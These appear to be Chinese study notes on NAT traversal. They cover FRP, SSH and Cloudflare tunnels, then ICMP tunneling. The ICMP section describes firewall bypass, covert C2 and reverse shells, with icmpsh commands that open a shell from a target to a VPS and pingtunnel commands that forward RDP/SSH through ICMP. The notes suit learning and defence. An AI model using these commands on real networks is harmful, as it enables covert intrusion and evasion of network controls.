31.内网穿透
内网穿透
一、概念
把局域网内网主机暴露到公网,外网可直接访问内网设备、服务。
二、常见用途
远程运维内网服务器、本地项目外网调试、内网端口对外访问。
三、主流方式
-
FRP
(最常用)
客户端部署内网机,服务端放公网 VPS,端口映射转发。
-
NAT123 / 花生壳
图形化傻瓜式,适合个人简易穿透。
-
SSH 隧道
轻便临时穿透,无需额外软件。
-
Cloudflare Tunnel
免费无公网 IP,外网访问本地服务。
四、FRP 核心流程
- 公网服务器部署 frps 服务端
- 内网机器运行 frpc 客户端,连接服务端
- 配置端口映射,外网 IP + 端口访问内网服务
五、常用隧道类型
- 端口转发:单端口映射
- TCP/UDP:协议穿透
- HTTP/HTTPS:网站服务穿透
ngork内网穿透
https://zhuanlan.zhihu.com/p/1923395574637507575
frp内网穿透
https://zhuanlan.zhihu.com/p/1913504354721333378
icmp隧道
ICMP 隧道是一种把 TCP/UDP/IP 流量封装在ICMP Echo(ping)包的数据字段里进行传输的隐蔽通信技术。
通俗讲:用 ping 包 “夹带私货”,把本来不能过防火墙的流量,伪装成正常 ping 流量穿过边界设备。
- 特点:无端口、无连接、防火墙普遍放行、普通用户即可发起
- 典型用途:内网出网、防火墙绕过、隐蔽 C2、反弹 Shell
常见工具(实战常用)
1)icmpsh(最经典,Windows/Linux)
- 客户端(目标机):
icmpsh.exe -t 服务端IP - 服务端(VPS,Linux):
./icmpsh_m.py 0.0.0.0 - 效果:反弹 cmd/bash,纯 ICMP,无端口
2)pingtunnel(ptunnel,全平台,支持 TCP 转发)
如果防火墙不允许3389tcp流量通过 可以转icmp协议
- 服务端:
ptunnel -x 密码 - 客户端:
ptunnel -p 服务端IP -x 密码 -l 本地端口 -r 目标IP:目标端口 - 场景:把本地端口流量通过 ICMP 隧道转发到内网目标(如 3389、22)
3)h2ping /icmptunnel(Linux 内核级)
- 直接创建虚拟网卡(tun),所有 IP 流量走 ICMP
- 适合全局代理、内网穿透

浙公网安备 33010602011771号